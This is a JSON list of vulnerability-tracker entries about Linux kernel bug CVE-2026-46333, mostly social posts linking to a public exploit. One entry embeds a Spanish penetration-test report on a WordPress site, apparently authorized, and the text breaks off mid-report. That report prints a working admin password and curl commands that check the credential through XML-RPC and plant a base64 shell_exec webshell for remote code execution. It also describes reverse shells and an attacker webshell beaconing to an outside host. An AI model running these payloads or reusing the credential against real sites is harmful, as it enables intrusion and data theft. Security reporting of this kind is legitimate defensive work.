"e74b505d-fcf6-4927-a6e2-a65351e63646", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "published-proof-of-concept", "source": "https://t.me/thehackernews/9053", "content": "\ud83d\uded1 [New] 9-Year-Old Linux Kernel Bug = Local Root on Default Debian, Ubuntu & Fedora.\n\nhttps://thehackernews.com/2026/05/9-year-old-linux-kernel-flaw-enables.html\n\nCVE-2026-46333 (ssh-keysign-pwn) lets any unprivileged user steal /etc/shadow + SSH host keys and run commands as root.\n\n\ud83d\udd38 Public PoC available\n\ud83d\udd38 Patch your kernel NOW\n\ud83d\udd38 Quick temp fix - sysctl kernel.yama.ptrace_scope=2", "creation_timestamp": "2026-05-21T07:42:55.000000Z"}, {"uuid": "fe44e392-9b51-4609-a500-97095b934691", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mmkwa6j64z2e", "content": "Top 3 CVE for last 7 days:\nCVE-2026-45584: 65 interactions\nCVE-2026-45250: 64 interactions\nCVE-2026-46333: 25 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-69: 18 interactions\nCVE-2026-20223: 3 interactions\nCVE-2026-41091: 3 interactions\n", "creation_timestamp": "2026-05-24T02:30:41.542652Z"}, {"uuid": "b8e8b39a-d166-45ff-970d-4307ec0f17f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/ehcgroup.bsky.social/post/3mmrl7opcy227", "content": "Escalamiento de privilegios local en el kernel de Linux, permite filtrar claves SSH y hashes de contrase\u00f1as.\n\nUna vulnerabilidad oculta por 9 a\u00f1os en el kernel (CVE-2026-46333) permite a usuarios locales sin privilegios robar claves SSH y hashes de contrase\u00f1as.\nwww.linkedin.com/pulse/escala...", "creation_timestamp": "2026-05-26T18:02:13.621197Z"}, {"uuid": "12c1e69a-f1ca-489e-bd8f-9a7591d142bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/nitrux.bsky.social/post/3mmmwz6fdfs2z", "content": "PSA: We've confirmed that the mitigation for CVE-2026-46333 (ssh-keysign-pwn) inadvertently prevents Wine and Proton from functioning, affecting game compatibility.\n\nBug Tracker ID: #230\n\nFor more information, check the PSA: nxos.org/psa/psa-nitr....\n\n#Nitrux #PSA", "creation_timestamp": "2026-05-24T21:50:01.105399Z"}, {"uuid": "474fa2fd-385a-4793-875a-8a5a7f23d911", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mmngpinxe52e", "content": "Top 3 CVE for last 7 days:\nCVE-2026-45250: 72 interactions\nCVE-2026-45584: 65 interactions\nCVE-2026-46333: 24 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-45250: 8 interactions\nCVE-2026-26980: 6 interactions\nCVE-2026-9082: 4 interactions\n", "creation_timestamp": "2026-05-25T02:30:54.891370Z"}, {"uuid": "a84496ba-4848-4152-939b-7a162423e56d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mmuy3mednn24", "content": "Top 3 CVE for last 7 days:\nCVE-2026-45250: 72 interactions\nCVE-2026-46333: 18 interactions\nCVE-2026-69: 18 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-48095: 11 interactions\nCVE-2026-48710: 4 interactions\nCVE-2026-1933: 3 interactions\n", "creation_timestamp": "2026-05-28T02:30:32.722137Z"}, {"uuid": "bd6f372c-a933-4319-b6df-f755fb5034fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-46339", "type": "published-proof-of-concept", "source": "https://github.com/decolua/9router/security/advisories/GHSA-fhh6-4qxv-rpqj", "content": "", "creation_timestamp": "2026-05-13T13:15:48.000000Z"}, {"uuid": "5b0d1a64-f401-4c01-bf27-2836f795dd94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-46337", "type": "published-proof-of-concept", "source": "https://github.com/WWBN/AVideo/security/advisories/GHSA-w4qq-74h6-58wq", "content": "", "creation_timestamp": "2026-05-13T13:06:46.000000Z"}, {"uuid": "79ad1420-db93-4874-81c9-e43b3a07db9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/infosecbot.bsky.social/post/3mn44mnw76r23", "content": "While I wait for my agents to finish some work, a short post on the part of CVE-2026-46333 I find most interesting: Unix design bug. Imperfect analogies and cute/cringe images included.\n\nPrivileged Unix code\u2026\n\n\ud83d\udd01 RT @julianor | reposted by @thegrugq\nhttps://x.com/julianor/status/2060525982608404487", "creation_timestamp": "2026-05-30T22:40:18.244218Z"}, {"uuid": "66c5a367-abba-40d8-b6a4-079ff15ab46f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mmxikgplyz2a", "content": "Top 3 CVE for last 7 days:\nCVE-2026-69: 19 interactions\nCVE-2026-26980: 17 interactions\nCVE-2026-46333: 17 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-35616: 10 interactions\nCVE-2026-25592: 7 interactions\nCVE-2026-26030: 7 interactions\n", "creation_timestamp": "2026-05-29T02:30:29.678470Z"}, {"uuid": "444ba7b7-4582-480c-b06a-c8d013ca9e42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mnah5pk4as2d", "content": "\u201cSSH-KEYSIGN-PWN: THE 9-YEAR-OLD KERNEL BUG THAT CAN STEAL YOUR SHADOW FILE IN SECONDS\u201d +\u00a0Video\n\nIntroduction: A critical logic flaw has been discovered in the Linux kernel\u2019s process access control mechanism (`__ptrace_may_access()`), remaining hidden for nine years. Known as CVE-2026-46333 or\u2026", "creation_timestamp": "2026-06-01T15:59:27.031498Z"}, {"uuid": "5b0d16dc-fa52-4756-835d-2ae00998965b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/suse-linux-kernel-multiple-vulnerabilities_20260601", "content": "", "creation_timestamp": "2026-05-31T20:00:00.000000Z"}, {"uuid": "7b8007bb-994c-4358-a751-8528057ae090", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://t.me/P0x3k_1N73LL1G3NC3/361", "content": "ssh-keysign-pwn \u2014 CVE-2026-46333\n\nA critical race condition flaw in pre-31e62c2ebbfd Linux kernels. Due to a window during process exit where the memory management structure is cleared before file descriptors are closed, an unprivileged user can use pidfd_getfd(2) to steal open file descriptors of privileged processes, enabling unauthorized reading of root-owned files.\n\n\ud83d\udd17 Exploit:\nhttps://github.com/0xdeadbeefnetwork/ssh-keysign-pwn\n\n\ud83d\udd17 Source:\nhttps://blog.qualys.com/vulnerabilities-threat-research/2026/05/20/cve-2026-46333-local-root-privilege-escalation-and-credential-disclosure-in-the-linux-kernel-ptrace-path\n\n#linux #kernel #privesc #racecondition #pidfd", "creation_timestamp": "2026-06-01T14:36:08.000000Z"}, {"uuid": "8458c32c-792a-4942-a0e9-77648c16a43e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/flatcar.org/post/3mncldh6zk22o", "content": "\ud83d\udce6 Package updates: Linux 6.12.91 (Alpha/Beta/Stable), Linux 6.6.141 (LTS), ca-certificates 3.124\n\ud83d\udd12 Security maintenance release for the recently disclosed kernel LPEs Fragnesia (CVE-2026-46300) and ssh-keysign-pwn (CVE-2026-46333), plus the usual kernel CVE roll-up", "creation_timestamp": "2026-06-02T12:19:35.308404Z"}, {"uuid": "6040a891-d7d4-4894-8b8b-c8f7e658b76d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/linkersec.bsky.social/post/3mnfbcmoo7k2o", "content": "Logic bug in the Linux kernel's __ptrace_may_access() function (CVE-2026-46333)\n\nArticle about a logical bug in the ptrace implementation that allows getting access to file descriptors of other processes and thus escalating privileges in certain scenarios.\n\ncdn2.qualys.com/advisory/202...", "creation_timestamp": "2026-06-03T13:58:11.996211Z"}, {"uuid": "391e0d1c-56e8-46c8-bea0-366622c182df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://gist.github.com/C4sh3R/1f99346b1086e7d358ff1be8f5be7a42", "content": "\n\n\n\n\n\nColumtech \u2014 Informe de Auditor\u00eda de Seguridad \u00b7 c4sh3r\n\n  :root {\n    --bg: #0b0d12;\n    --bg-2: #11151c;\n    --panel: #161b25;\n    --panel-2: #1d2330;\n    --border: #2a3142;\n    --text: #e6e9ef;\n    --text-dim: #99a2b3;\n    --accent: #ff4d6d;\n    --accent-2: #ffb86b;\n    --crit: #ff3d57;\n    --high: #ff8b3d;\n    --med:  #ffd84a;\n    --low:  #4ac6ff;\n    --info: #8c9fb0;\n    --ok: #3ddc97;\n    --code-bg: #0a0d14;\n    --mono: ui-monospace, \"JetBrains Mono\", \"Fira Code\", Menlo, Consolas, monospace;\n  }\n  * { box-sizing: border-box; }\n  html, body { margin: 0; padding: 0; background: var(--bg); color: var(--text);\n               font-family: -apple-system, BlinkMacSystemFont, \"Segoe UI\", Roboto, \"Helvetica Neue\", Arial, sans-serif;\n               line-height: 1.55; -webkit-font-smoothing: antialiased; }\n  a { color: var(--accent-2); text-decoration: none; }\n  a:hover { text-decoration: underline; }\n  .hero {\n    padding: 60px 40px 50px;\n    background:\n      radial-gradient(1200px 400px at 10% -10%, rgba(255,77,109,0.25), transparent 60%),\n      radial-gradient(900px 380px at 100% 0%, rgba(255,184,107,0.15), transparent 60%),\n      linear-gradient(180deg, #0e1219, #0b0d12);\n    border-bottom: 1px solid var(--border);\n  }\n  .hero-inner { max-width: 1100px; margin: 0 auto; }\n  .eyebrow {\n    display: inline-flex; align-items: center; gap: 8px;\n    font-family: var(--mono); font-size: 12px; letter-spacing: 0.15em;\n    text-transform: uppercase; color: var(--accent);\n    padding: 4px 10px; border: 1px solid rgba(255,77,109,0.35);\n    border-radius: 999px; background: rgba(255,77,109,0.08);\n  }\n  .hero h1 { font-size: 44px; line-height: 1.1; margin: 18px 0 10px; letter-spacing: -0.02em; }\n  .hero h1 .accent { color: var(--accent); }\n  .hero .sub { color: var(--text-dim); font-size: 17px; max-width: 720px; }\n  .meta { margin-top: 30px; display: grid; grid-template-columns: repeat(4, 1fr); gap: 14px; }\n  .meta .card { background: rgba(22,27,37,0.7); border: 1px solid var(--border); border-radius: 10px; padding: 14px 16px; }\n  .meta .card .k { font-size: 11px; text-transform: uppercase; letter-spacing: 0.12em; color: var(--text-dim); }\n  .meta .card .v { font-family: var(--mono); font-size: 14px; margin-top: 6px; word-break: break-all; }\n  .author-strip {\n    display: flex; align-items: center; gap: 14px; margin-top: 24px;\n    padding: 12px 16px; border: 1px dashed var(--border); border-radius: 10px;\n    background: rgba(255,255,255,0.02); font-family: var(--mono); font-size: 13px; color: var(--text-dim);\n  }\n  .author-strip strong { color: var(--accent); }\n  .container { max-width: 1100px; margin: 0 auto; padding: 40px; }\n  section { margin-bottom: 60px; }\n  h2 { font-size: 26px; margin: 0 0 18px; letter-spacing: -0.01em; display: flex; align-items: center; gap: 12px; }\n  h2::before { content: ''; width: 4px; height: 22px; background: var(--accent); border-radius: 2px; }\n  h3 { font-size: 19px; margin: 22px 0 10px; }\n  p { color: var(--text); }\n  p.dim { color: var(--text-dim); }\n  .stats { display: grid; grid-template-columns: repeat(5, 1fr); gap: 12px; margin-top: 10px; }\n  .stat { background: var(--panel); border: 1px solid var(--border); border-radius: 12px; padding: 18px; text-align: center; }\n  .stat .num { font-size: 32px; font-weight: 700; font-family: var(--mono); }\n  .stat .lbl { font-size: 12px; text-transform: uppercase; letter-spacing: 0.12em; color: var(--text-dim); margin-top: 6px; }\n  .stat.crit .num { color: var(--crit); } .stat.high .num { color: var(--high); }\n  .stat.med  .num { color: var(--med); }  .stat.low  .num { color: var(--low); }\n  .stat.info .num { color: var(--info); }\n  table.summary { width: 100%; border-collapse: collapse; margin-top: 16px; background: var(--panel); border: 1px solid var(--border); border-radius: 12px; overflow: hidden; }\n  table.summary th, table.summary td { padding: 12px 14px; text-align: left; border-bottom: 1px solid var(--border); font-size: 14px; }\n  table.summary th { background: var(--panel-2); font-weight: 600; font-size: 12px; text-transform: uppercase; letter-spacing: 0.08em; color: var(--text-dim); }\n  table.summary tr:last-child td { border-bottom: none; }\n  table.summary tr:hover td { background: rgba(255,255,255,0.02); }\n  .badge { display: inline-block; padding: 3px 9px; border-radius: 4px; font-size: 11px; font-weight: 700; font-family: var(--mono); letter-spacing: 0.05em; text-transform: uppercase; }\n  .badge.crit { background: rgba(255,61,87,0.15); color: var(--crit); border: 1px solid rgba(255,61,87,0.4); }\n  .badge.high { background: rgba(255,139,61,0.13); color: var(--high); border: 1px solid rgba(255,139,61,0.4); }\n  .badge.med  { background: rgba(255,216,74,0.13); color: var(--med);  border: 1px solid rgba(255,216,74,0.4); }\n  .badge.low  { background: rgba(74,198,255,0.13); color: var(--low);  border: 1px solid rgba(74,198,255,0.4); }\n  .badge.info { background: rgba(140,159,176,0.13); color: var(--info); border: 1px solid rgba(140,159,176,0.4); }\n  .finding { background: var(--panel); border: 1px solid var(--border); border-radius: 14px; margin-top: 22px; overflow: hidden; }\n  .finding .head { display: flex; align-items: center; gap: 14px; flex-wrap: wrap; padding: 18px 22px; background: var(--panel-2); border-bottom: 1px solid var(--border); }\n  .finding.crit .head { box-shadow: inset 4px 0 0 0 var(--crit); }\n  .finding.high .head { box-shadow: inset 4px 0 0 0 var(--high); }\n  .finding.med .head  { box-shadow: inset 4px 0 0 0 var(--med); }\n  .finding.low .head  { box-shadow: inset 4px 0 0 0 var(--low); }\n  .finding.info .head { box-shadow: inset 4px 0 0 0 var(--info); }\n  .finding .head .id { font-family: var(--mono); color: var(--text-dim); font-size: 13px; }\n  .finding .head .title { font-size: 17px; font-weight: 600; flex: 1; }\n  .finding .body { padding: 22px; }\n  .finding .body h4 { font-size: 11px; text-transform: uppercase; letter-spacing: 0.14em; color: var(--text-dim); margin: 18px 0 8px; }\n  .finding .body h4:first-child { margin-top: 0; }\n  .finding ul { margin: 0 0 6px; padding-left: 22px; }\n  .finding li { margin-bottom: 4px; }\n  pre, code { font-family: var(--mono); font-size: 13px; }\n  pre { background: var(--code-bg); border: 1px solid var(--border); border-radius: 8px; padding: 14px 16px; overflow-x: auto; line-height: 1.5; color: #d6dbe6; }\n  code.inline { background: rgba(255,255,255,0.05); padding: 1px 6px; border-radius: 4px; border: 1px solid var(--border); font-size: 12px; }\n  .kv { display: grid; grid-template-columns: 160px 1fr; gap: 6px 16px; font-size: 13.5px; }\n  .kv .k { color: var(--text-dim); font-family: var(--mono); font-size: 12px; padding-top: 2px; }\n  .callout { border-left: 3px solid var(--accent); background: rgba(255,77,109,0.05); padding: 14px 18px; border-radius: 0 8px 8px 0; margin: 12px 0; font-size: 14px; }\n  .callout.danger { border-color: var(--crit); background: rgba(255,61,87,0.07); }\n  .callout.warn   { border-color: var(--high); background: rgba(255,139,61,0.06); }\n  .callout.ok     { border-color: var(--ok);  background: rgba(61,220,151,0.06); }\n  footer { border-top: 1px solid var(--border); padding: 36px 40px; margin-top: 40px; color: var(--text-dim); text-align: center; font-size: 13px; background: var(--bg-2); }\n  footer .sig { font-family: var(--mono); font-size: 14px; color: var(--accent); }\n  .chain { background: var(--code-bg); border: 1px solid var(--border); border-radius: 10px; padding: 20px 24px; margin: 14px 0; }\n  .chain-step { display: flex; align-items: flex-start; gap: 14px; margin-bottom: 10px; }\n  .chain-step:last-child { margin-bottom: 0; }\n  .chain-num { background: var(--accent); color: #fff; border-radius: 50%; width: 22px; height: 22px; display: flex; align-items: center; justify-content: center; font-size: 12px; font-weight: 700; flex-shrink: 0; margin-top: 2px; }\n  .chain-text { font-family: var(--mono); font-size: 13px; color: #d6dbe6; }\n  .chain-arrow { color: var(--accent); font-size: 18px; margin: 4px 0; text-align: center; }\n  @media (max-width: 760px) {\n    .hero h1 { font-size: 32px; }\n    .meta, .stats { grid-template-columns: repeat(2, 1fr); }\n    .container, .hero { padding: 30px 22px; }\n  }\n\n\n\n\n\n\n  \n\n    \u258c Auditor\u00eda de Seguridad \u00b7 2026-06-03/04\n    \nColumtech OnlineInforme de Seguridad Web\n    \nEvaluaci\u00f3n de seguridad completa de columtech.online. Resultado: compromiso total \u2014 admin WordPress, RCE como www-data, defacing demostrado, escalada a root bloqueada por hardening excepcional.\n\n    \n\n      \n\nObjetivo\ncolumtech.online\n      \n\nBackend\nApache 2.4.66 \u00b7 PHP 8.2.30 \u00b7 MySQL 8.0.45\n      \n\nStack\nWP 7.0 \u00b7 Elementor 4.0.2 \u00b7 Docker \u00b7 Cloudflare \u00b7 Caddy\n      \n\nFecha\n2026-06-03 / 04\n    \n\n    \n\n      Autor del informe \u00b7 c4sh3r \u00b7 auditor\u00eda solicitada por el propietario del dominio \u00b7 autorizaci\u00f3n total\n    \n  \n\n\n\n\n\n  \n\n    \nResumen Ejecutivo\n    \nSe realiz\u00f3 una auditor\u00eda de seguridad end-to-end sobre columtech.online, un portal WordPress operado por el propietario con fines de pr\u00e1ctica y aprendizaje. La evaluaci\u00f3n cubri\u00f3 reconocimiento pasivo, enumeraci\u00f3n de usuarios, an\u00e1lisis de superficie de ataque en plugins y XML-RPC, explotaci\u00f3n de credenciales d\u00e9biles, post-explotaci\u00f3n como www-data dentro de un contenedor Docker, demostraci\u00f3n de defacing y exploraci\u00f3n exhaustiva de escalada de privilegios a root.\n    \nEl sitio fue comprometido completamente a nivel de aplicaci\u00f3n: acceso de administrador WordPress, ejecuci\u00f3n remota de c\u00f3digo como www-data, lectura/escritura del sistema de archivos y defacing demostrado. La escalada a root dentro del contenedor fue bloqueada por un perfil de hardening que combina seccomp, AppArmor y ptrace_scope=3, resistiendo todos los CVEs p\u00fablicos conocidos para kernel 6.8.\n    \nSe descubri\u00f3 adicionalmente una webshell real de un atacante externo (wp-loginizer.php \u2014 WSO Mr.X v2.5 con beacon a cdn.privdayz.com) que requiere eliminaci\u00f3n inmediata.\n\n    \n\n      Riesgo principal: Contrase\u00f1a de administrador d\u00e9bil marce:marce123 accesible v\u00eda XML-RPC sin rate-limit \u2192 compromiso total del sitio en minutos.\n    \n\n    \n\n      \n\n3\nCr\u00edticos\n      \n\n4\nAltos\n      \n\n4\nMedios\n      \n\n4\nBajos\n      \n\n3\nInformativos\n    \n  \n\n  \n\n    \nCadena de Ataque Demostrada\n    \n\n      \n\n1\nREST API bypass (?rest_route=/wp/v2/users) \u2192 enum admin marce (id=1) + prueba (id=2) + columtech (id=3)\n      \n\u2193\n      \n\n2\nGravatar SHA-256 reverse \u2192 email de prueba: prueba@gmail.com\n      \n\u2193\n      \n\n3\nXML-RPC wp.getUsersBlogs (credential oracle sin rate-limit) \u2192 marce:marce123 [administrator]\n      \n\u2193\n      \n\n4\nAdmin WP \u2192 REST API POST /wp/v2/plugins \u2192 instalaci\u00f3n code-snippets plugin\n      \n\u2193\n      \n\n5\nCode Snippets PHP snippet \u2192 RCE como www-data \u00b7 uid=33 \u00b7 hostname 6c49a066ba4c\n      \n\u2193\n      \n\n6\nDefacing: t\u00edtulo del sitio + sticky post + p\u00e1gina est\u00e1tica con matrix rain / glitch effects\n      \n\u2193\n      \n\n7\nEscalada: 12 CVEs y t\u00e9cnicas probadas \u2192 bloqueadas por seccomp + AppArmor + ptrace_scope=3\n    \n  \n\n  \n\n    \nAlcance y Metodolog\u00eda\n    \n\n      \nObjetivo\nhttps://www.columtech.online \u2014 WordPress 7.0 + Elementor 4.0.2 + plugin Filester/elFinder\n      \nTipo\nCaja negra \u2192 caja gris (tras obtener credenciales) \u00b7 sin acceso previo a servidor\n      \nAutorizaci\u00f3n\nDominio propiedad del solicitante \u00b7 auditor\u00eda completa autorizada verbalmente\n      \nIdentificaci\u00f3n\nTodas las peticiones etiquetadas con User-Agent: c4sh3r y X-Bug-Bounty: c4sh3r\n      \nNo destructivo\nEl defacing fue demostrado y revertido. Ficheros de prueba eliminados. No se destruy\u00f3 ni borr\u00f3 informaci\u00f3n real del sitio.\n      \nHerramientas\ncurl, Python 3, LinPEAS, bore (tunnel), GCC, git (exploit repos), b\u00fasqueda web de CVEs en tiempo real\n    \n  \n\n  \n\n    \nResumen de Hallazgos\n    \n\n      IDSeveridadHallazgoComponente\n      \n        C-01Cr\u00edticoCredencial admin d\u00e9bil \u2014 acceso total v\u00eda XML-RPCWordPress \u00b7 XML-RPC\n        C-02Cr\u00edticoWebshell externa preexistente (WSO Mr.X)wp-loginizer.php\n        C-03Cr\u00edticoRCE como www-data v\u00eda Code Snippets pluginWordPress \u00b7 Code Snippets REST\n        H-01AltoXML-RPC expuesto \u2014 SSRF + credential oracle sin rate-limitxmlrpc.php\n        H-02AltoCVE-2026-6127 Elementor XSS almacenado v\u00eda REST APIElementor 4.0.2 \u2264 4.0.4\n        H-03AltoEnumeraci\u00f3n de usuarios por 4 v\u00edas sin rate-limitREST API \u00b7 wp-login \u00b7 lostpassword\n        H-04AltoNonce de plugin expuesto en REST sin autenticaci\u00f3nFilevue \u00b7 /wp/v2/pages/7\n        M-01MedioWordPress 7.0 / Elementor 4.0.2 \u2014 versiones desactualizadasCore + plugins\n        M-02MedioEmail de usuario deducible por Gravatar hash (SHA-256)REST API \u00b7 Gravatar\n        M-03MedioRecuperaci\u00f3n de contrase\u00f1a rota + oracle de usuariowp-login.php \u00b7 lostpassword\n        M-04Mediowp-cron.php accesible p\u00fablicamentewp-cron.php\n        L-01BajoCabeceras de seguridad ausentes (HSTS, X-Content-Type, Permissions-Policy)HTTP Headers \u00b7 Caddy\n        L-02BajoOrigen Apache/versi\u00f3n filtrado en respuestas 404Apache 2.4.66 \u00b7 Cloudflare bypass\n        L-03Bajoreadme.html accesible \u2014 divulgaci\u00f3n de versi\u00f3n WPWordPress Core\n        L-04BajoCVE-2026-24072 Apache 2.4.66 mod_rewrite htaccess readApache 2.4.66\n        I-01InfoContenedor Docker con hardening seccomp/AppArmor efectivoInfraestructura\n        I-02InfoDB creds en claro en variable de entorno del containerDocker env \u00b7 WORDPRESS_DB_*\n        I-03InfoKernel 6.8.0-117 vulnerable a CVE-2026-46333 pero bloqueado por seccompKernel \u00b7 pidfd_getfd\n      \n    \n  \n\n  \n\n    \nHallazgos Detallados\n\n    \n    \n\n      \n\n        C-01\n        Cr\u00edtico\n        Credencial de administrador d\u00e9bil \u2014 compromiso total v\u00eda XML-RPC\n      \n      \n\n        \nDescripci\u00f3n\n        \nLa cuenta de administrador marce ten\u00eda la contrase\u00f1a marce123. XML-RPC no implementa rate-limiting, permitiendo descubrirla mediante credential oracle con pocas decenas de intentos. Una vez autenticados, se obtuvo acceso total: lectura de opciones del sitio, creaci\u00f3n/edici\u00f3n de posts, subida de ficheros y instalaci\u00f3n de plugins.\n        \nPoC\n        \n# Descubrimiento de credenciales v\u00eda XML-RPC oracle\ncurl -X POST https://www.columtech.online/xmlrpc.php \\\n  -d '<?xml version=\"1.0\"?><methodCall>\n       <methodName>wp.getUsersBlogs</methodName>\n       <params>\n         <param><value><string>marce</string></value></param>\n         <param><value><string>marce123</string></value></param>\n       </params></methodCall>'\n\n# Respuesta: isAdmin=1, blogName=Laboratorio\n# RESULTADO: acceso de administrador confirmado\n        \nImpacto\n        \n\n          \nAcceso completo al panel de administraci\u00f3n WordPress\n          \nInstalaci\u00f3n de plugins arbitrarios \u2192 RCE\n          \nLectura/escritura de todos los contenidos y usuarios\n          \nDefacing del sitio demostrado\n          \nSubida de ficheros al servidor\n        \n        \nRemediaci\u00f3n\n        \n# 1. Cambiar contrase\u00f1a inmediatamente (m\u00ednimo 20 chars, aleatoria)\n# 2. Deshabilitar XML-RPC si no se usa Jetpack/app m\u00f3vil\nadd_filter('xmlrpc_enabled', '__return_false');\n\n# 3. Alternativamente, bloquear en Caddy/Cloudflare\n# Cloudflare WAF rule: (http.request.uri.path eq \"/xmlrpc.php\") \u2192 Block\n      \n    \n\n    \n    \n\n      \n\n        C-02\n        Cr\u00edtico\n        Webshell externa preexistente \u2014 WSO Mr.X v2.5\n      \n      \n\n        \nDescripci\u00f3n\n        \nSe encontr\u00f3 /var/www/html/wp-loginizer.php (237 KB), una webshell WSO (\u00abWeb Shell by orb\u00bb) Mr.X BYPASS v2.5 completamente funcional. El fichero incluye un file manager con terminal, file editor, y un beacon de tracking que reporta la URL de cada visita a https://cdn.privdayz.com/images/logo.jpg. El sitio fue comprometido por un atacante externo antes de esta auditor\u00eda (posts de spam en ruso desde 2023).\n        \nPoC\n        \ncurl https://www.columtech.online/wp-loginizer.php\n# Responde con file manager completo (sin autenticaci\u00f3n adicional)\n# Contiene: terminal, editor de archivos, upload\n# BEACON: POST a cdn.privdayz.com con location.href del visitante\n        \nImpacto\n        \n\n          \nAtacante externo tiene acceso de shell activo como www-data\n          \nExfiltraci\u00f3n de datos de visitantes a servidor tercero (privdayz.com)\n          \nPosible pivoting a base de datos y archivos\n          \nRGPD/privacidad: beacon rastrea IPs de visitantes\n        \n        \nRemediaci\u00f3n\n        \n# URGENTE \u2014 eliminar el fichero inmediatamente\nrm /var/www/html/wp-loginizer.php\nrm /var/www/html/2ops.php     # file manager adicional\nrm /var/www/html/x.php        # webshell de auditor\u00eda (nuestro)\nrm /var/www/html/rs.php       # reverse shell de auditor\u00eda (nuestro)\nrm /var/www/html/rs2.php      # reverse shell de auditor\u00eda (nuestro)\n\n# Auditar TODOS los archivos modificados en los \u00faltimos 90 d\u00edas:\nfind /var/www/html -newer /var/www/html/wp-config.php -name \"*.php\" | sort\n      \n    \n\n    \n    \n\n      \n\n        C-03\n        Cr\u00edtico\n        RCE como www-data v\u00eda Code Snippets REST API\n      \n      \n\n        \nDescripci\u00f3n\n        \nCon acceso de administrador, se instal\u00f3 el plugin Code Snippets v\u00eda REST API autenticada (POST /wp/v2/plugins). El plugin expone una API REST que permite crear snippets PHP que se ejecutan en cada carga de p\u00e1gina. Se cre\u00f3 un snippet con webshell (shell_exec(base64_decode($_GET['c4sh3r']))) que ejecuta comandos arbitrarios como uid=33(www-data).\n        \nPoC\n        \n# Instalar plugin\ncurl -X POST https://columtech.online/index.php?rest_route=/wp/v2/plugins \\\n  -H \"X-WP-Nonce: $NONCE\" -H \"Cookie: $ADMIN_COOKIES\" \\\n  -d '{\"slug\":\"code-snippets\",\"status\":\"active\"}'\n\n# Crear snippet webshell\ncurl -X POST https://columtech.online/index.php?rest_route=/code-snippets/v1/snippets \\\n  -H \"X-WP-Nonce: $NONCE\" \\\n  -d '{\"code\":\"if(isset($_GET[\\\"c4sh3r\\\"])){die(shell_exec(base64_decode($_GET[\\\"c4sh3r\\\"])));}\", \"scope\":\"front-end\",\"active\":true}'\n\n# Ejecutar comando\ncurl \"https://columtech.online/?c4sh3r=$(echo -n 'id' | base64)\"\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\n        \nImpacto\n        \n\n          \nEjecuci\u00f3n remota de comandos en el servidor\n          \nLectura de wp-config.php y credenciales de base de datos\n          \nEscritura en /var/www/html (filesystem del host)\n          \nDefacing del sitio completo\n          \nReverse shell interactiva al atacante demostrada\n        \n        \nRemediaci\u00f3n\n        \n# Eliminar plugin Code Snippets y snippet malicioso\n# Revisar y eliminar TODOS los plugins no esenciales\n# Cambiar credenciales admin PRIMERO (ver C-01)\n# Implementar WAF rule para bloquear par\u00e1metros ?c4sh3r=\n      \n    \n\n    \n    \n\n      \n\n        H-01\n        Alto\n        XML-RPC expuesto \u2014 SSRF confirmado + amplificaci\u00f3n de credential testing\n      \n      \n\n        \nDescripci\u00f3n\n        \nxmlrpc.php est\u00e1 habilitado con system.multicall disponible. El m\u00e9todo pingback.ping 